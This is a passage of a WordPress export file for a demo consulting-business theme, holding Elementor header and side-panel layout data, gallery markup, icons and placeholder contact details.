		<wp:meta_value><![CDATA[[{"id":"2bd5f14","elType":"section","settings":{"content_position":"middle","structure":"21","background_background":"classic","background_color":"#0B2A41","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"f191d30","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"6d41460","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"  Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_color":"#55BB53","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"icon_typography_font_weight":"500"},"elements":[],"widgetType":"icon-list"}],"isInner":false},{"id":"eb1b801","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"99b486b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_spacing":{"unit":"px","size":20,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","icon_color":"custom","hover_border_color":"#4B82FB","icon_secondary_color":"#8497A5","hover_secondary_color":"#FFFFFF","icon_padding":{"unit":"em","size":0,"sizes":[]}},"elements":[],"widgetType":"social-icons"},{"id":"eb90cd2","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","background_color":"#55BB53","hover_color":"#0B2A41","button_background_hover_color":"#F5F5F5","button_hover_border_color":"#55BB53","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"29","bottom":"12","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"36d15d3","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5bfa0e8","elType":"column","settings":{"_column_size":50,"_inline_size":30},"elements":[{"id":"4aa2514","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":383},"_padding":{"unit":"px","top":"26","right":"0","bottom":"27","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"b62b09b","elType":"column","settings":{"_column_size":50,"_inline_size":70,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"d943b8e","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#55BB53","menu_typography_typography":"custom","menu_typography_font_family":"Open Sans","smenu_typography_typography":"custom","smenu_typography_font_family":"Open Sans"},"elements":[],"widgetType":"imenu"},{"id":"64ad134","elType":"widget","settings":{"bg_btn":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;s:27:"icon_typography_font_weight";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:5:"align";i:2;s:17:"_ot_content_align";i:2;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:12:"icon_padding";i:1;}s:20:"section_social_hover";a:2:{s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:13:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:25:"button_hover_border_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:3:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;}s:19:"style_smenu_section";a:2:{s:27:"smenu_typography_typography";i:1;s:28:"smenu_typography_font_family";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Side Panel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/side-panel/</link>
		<pubDate>Fri, 24 Apr 2020 07:40:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=253</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
		Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.		
			<h4>Gallery</h4>		
			<figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-10" href='https://maxbizz.s3.amazonaws.com/images/project-10.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-10-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-10-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-10-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-12" href='https://maxbizz.s3.amazonaws.com/images/project-12.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-12-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-12-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-12-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-12-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-12.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-9" href='https://maxbizz.s3.amazonaws.com/images/project-9.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-9-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-9-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-9-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-9-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-9.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-7" href='https://maxbizz.s3.amazonaws.com/images/project-7.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-7-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-7-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-7-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-6" href='https://maxbizz.s3.amazonaws.com/images/project-6.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-5" href='https://maxbizz.s3.amazonaws.com/images/project-5.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure>
			<h4>Contact</h4>		
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23"></a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
				</h6>
								<p>411 University St, Seattle</p>
				<a href="mailto:%20maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:%20maxbizz@mail.com"></a>
				</h6>
								<p>maxbizz@mail.com</p>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>253</wp:post_id>
		<wp:post_date><![CDATA[2020-04-24 07:40:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-04-24 07:40:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[side-panel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"abdb372","elType":"section","settings":{"padding":{"unit":"px","top":"40","right":"40","bottom":"40","left":"40","isLinked":true}},"elements":[{"id":"42dd159","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"99ef7b3","elType":"widget","settings":{"logo_width":{"unit":"px","size":145,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350}},"elements":[],"widgetType":"ilogo"},{"id":"4408930","elType":"widget","settings":{"editor":"Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.","_margin":{"unit":"px","top":"0","right":"0","bottom":"27","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"561f157","elType":"widget","settings":{"title":"Gallery","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom"},"elements":[],"widgetType":"heading"},{"id":"0979c03","elType":"widget","settings":{"wp_gallery":[{"id":800,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-10.jpg"},{"id":803,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-12.jpg"},{"id":811,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-9.jpg"},{"id":819,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-7.jpg"},{"id":827,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-6.jpg"},{"id":823,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-5.jpg"}],"gallery_columns":"3","thumbnail_size":"maxbizz-portfolio-thumbnail-grid","open_lightbox":"yes"},"elements":[],"widgetType":"image-gallery"},{"id":"81b5457","elType":"widget","settings":{"title":"Contact","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom"},"elements":[],"widgetType":"heading"},{"id":"dfc527a","elType":"widget","settings":{"title_text":"","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#606060","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"a86f8fa","elType":"widget","settings":{"title_text":"","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":15,"sizes":[]},"title_typography_font_weight":"500","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#606060","title_typography_font_family":"Inter","description_color":"#606060","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c0cbcd5","elType":"widget","settings":{"title_text":"","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#606060","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"ca934ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#E40000"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#FF8523","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.6999999999999999555910790149937383830547332763671875,"sizes":[]},"icon_spacing":{"unit":"px","size":12,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_animation":"float","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-24]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_width";i:1;s:10:"logo_image";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:1:{s:21:"typography_typography";i:2;}}}}s:13:"image-gallery";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"section_gallery";a:4:{s:10:"wp_gallery";i:1;s:15:"gallery_columns";i:1;s:14:"thumbnail_size";i:1;s:13:"open_lightbox";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:32:"description_typography_font_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:6:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:1:{s:15:"hover_animation";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-5/</link>
		<pubDate>Fri, 24 Jul 2020 08:06:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=267</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.</p>		
			<a href="#" role="button">
						CONTACT US
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>267</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 08:06:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 08:06:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-5]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
